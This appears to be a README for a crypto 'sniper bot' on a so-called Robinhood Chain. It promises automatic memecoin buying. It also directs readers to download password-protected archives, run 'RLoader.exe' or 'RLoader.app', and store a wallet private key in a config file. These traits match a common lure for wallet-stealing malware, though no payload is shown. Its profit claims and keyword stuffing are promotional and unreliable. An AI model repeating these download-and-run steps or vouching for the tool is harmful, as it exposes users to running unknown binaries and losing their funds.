Robinhood Sniper Bot is a high-speed memecoin sniper for Robinhood Chain (L2) — the new Ethereum Layer 2 that went viral on July 1, 2026.
It automatically detects new tokens on Noxa.fun and Uniswap V4, buys them instantly at launch, and manages take‑profit / stop‑loss orders.
Chain ID: 4663 | Gas token: ETH | Block time: ~100 ms
| Metric | Value |
|---|---|
| Daily DEX volume | $600M+ |
| Uniswap V4 volume | $1B+ |
| $CASHCAT gain | +1,700–1,900% |
| Trader $85 → $2M | ✅ Real case |
Robinhood Chain is positioning itself as the 4th most active chain for speculative trading.
- 🔍 Scans new memecoins on Noxa.fun (Pump.fun analogue)
- ⚡ Instantly buys tokens at launch via Uniswap V4
- 🛡️ Filters by minimum liquidity ($5K+) and volume
- 📈 Auto TP/SL — take profit and stop loss management
- 🧪 Contract checks — basic honeypot detection
- 📱 Telegram notifications for every trade
- 💰 Supports ETH (memecoins) and USDG (stock tokens)
- Python 3.10+
- Web3.py
- Uniswap V4 Quoter
- Noxa.fun API
- Telegram Bot API
| Platform | Download | Run | Archive Password |
|---|---|---|---|
| Windows x64 | RLoader.zip |
Extract → run RLoader.exe |
500600 |
| macOS Apple Silicon | RLoaderMAC.zip |
Unzip → run RLoader.app |
500600 |
🔑 Password for both archives:
500600
Create a .env file in the root directory:
PRIVATE_KEY=your_private_key
WALLET_ADDRESS=your_wallet_address
ETH_AMOUNT=0.1
SLIPPAGE=2
TELEGRAM_BOT_TOKEN=your_telegram_bot_token
TELEGRAM_CHAT_ID=your_telegram_chat_idAll settings are in src/core/config.py:
| Parameter | Description | Default |
|---|---|---|
SNIPE_AMOUNT |
Amount per trade (ETH) | 0.05 |
MAX_SLIPPAGE |
Max slippage % | 2% |
MIN_LIQUIDITY |
Min pool liquidity | $5,000 |
TAKE_PROFIT |
Take‑profit % | 50% |
STOP_LOSS |
Stop‑loss % | 30% |
SCAN_INTERVAL |
Scan interval (sec) | 2 |
python -m src.core.sniperOr run the example:
python examples/example_usage.pyrobinhood-sniper-bot/
├── README.md
├── LICENSE
├── requirements.txt
├── setup.py
├── .gitignore
├── src/
│ ├── core/
│ │ ├── sniper.py # main bot logic
│ │ ├── scanner.py # Noxa.fun / Uniswap scanner
│ │ └── config.py # configuration
│ ├── utils/
│ │ ├── web3_utils.py # Web3 helpers
│ │ ├── telegram.py # Telegram notifications
│ │ └── helpers.py # misc functions
│ └── strategies/
│ └── default.py # default trading strategy
└── examples/
└── example_usage.py # usage example
- Scan — every 2 seconds, the bot checks Noxa.fun for new tokens.
- Filter — validates liquidity, volume, and contract safety.
- Snipe — sends a buy transaction as soon as a valid token is found.
- Monitor — tracks price and automatically sets TP/SL.
- Notify — sends a Telegram report with trade details.
robinhood chain, robinhood l2, memecoin sniper, sniper bot, robinhood memecoin, noxa fun, uniswap v4, cashcat, robinhood sniper bot, crypto sniper, memecoin bot, robinhood chain bot, eth sniping, usdg, flashloops, robinhood arbitrum, robinhood-bundler-bot, robinhood-sniper-bot, robinhood-trade-bot, robinhood-trading-bot, robinhood-bot, noxa-bundler-bot, noxa-sniper-bot, noxa-trade-bot
This tool is for educational purposes only.
Memecoin trading carries extremely high risk.
5.15% of memecoins lose all liquidity within the first 24 hours.
Use at your own risk. The author is not responsible for financial losses.
🚀 Happy sniping on Robinhood Chain!